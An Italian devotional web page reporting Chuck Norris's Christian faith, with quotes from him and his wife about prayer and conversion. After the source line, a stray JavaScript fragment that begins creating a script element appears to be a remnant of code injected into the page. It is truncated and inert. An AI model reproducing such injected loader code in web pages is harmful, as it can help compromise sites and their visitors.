Chuck Norris, Walker Texas Ranger: È molto importante fare pace con Dio

Chuck Norris, ex campione di arte marziale ed attore di fama mondiale, ha girato più di 20 film e diverse serie televisive.  Chuck afferma che i veri uomini vivono per Cristo.  Nel suo ruolo di uomo di ferro nella nota serie televisiva “Walker Texas Ranger”, egli rappresenta colui che è pronto ad aiutare gli altri, ma nella sua vita privata sa di avere bisogno dell’aiuto che viene dall’alto.  In un’intervista alla rivista “New Man” egli ha detto: ”È molto importante fare pace con Dio, finché si ha la possibilità.  La vita è molto fragile, e tu non sai quanto essa durerà, forse ancora qualche giorno, o qualche istante e poi tutto sarà finito”.  Gena, sua moglie ha aggiunto: ”Durante gli ultimi anni, Chuck ha scoperto cosa vuol dire credere in Gesù Cristo.  Nella puntata di “Walker Texas Ranger” di Natale 1999, egli ha voluto parlare molto chiaramente di Gesù Cristo, di quello che Lui è e che ha fatto nelle nostre vite”.

Gena continua: ”Chuck si e convertito a Cristo circa 11 anni fa, durante un triste periodo di crisi coniugale, superato grazie all’aiuto di Dio. Da allora preghiamo regolarmente insieme, poiché non e solo il corpo ad avere bisogno di una buona condizione, ma anche e soprattutto lo spirito che ha bisogno di un buon allenamento”.
Uno dei suoi impegni religiosi è quello di promuovere l’uso della lettura Bibbia e della preghiera nelle scuole pubbliche della sua nazione; infatti fa parte del consiglio di amministrazione dei direttori della NCBCPS

Fonte: http://www.incontraregesu.it/

var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.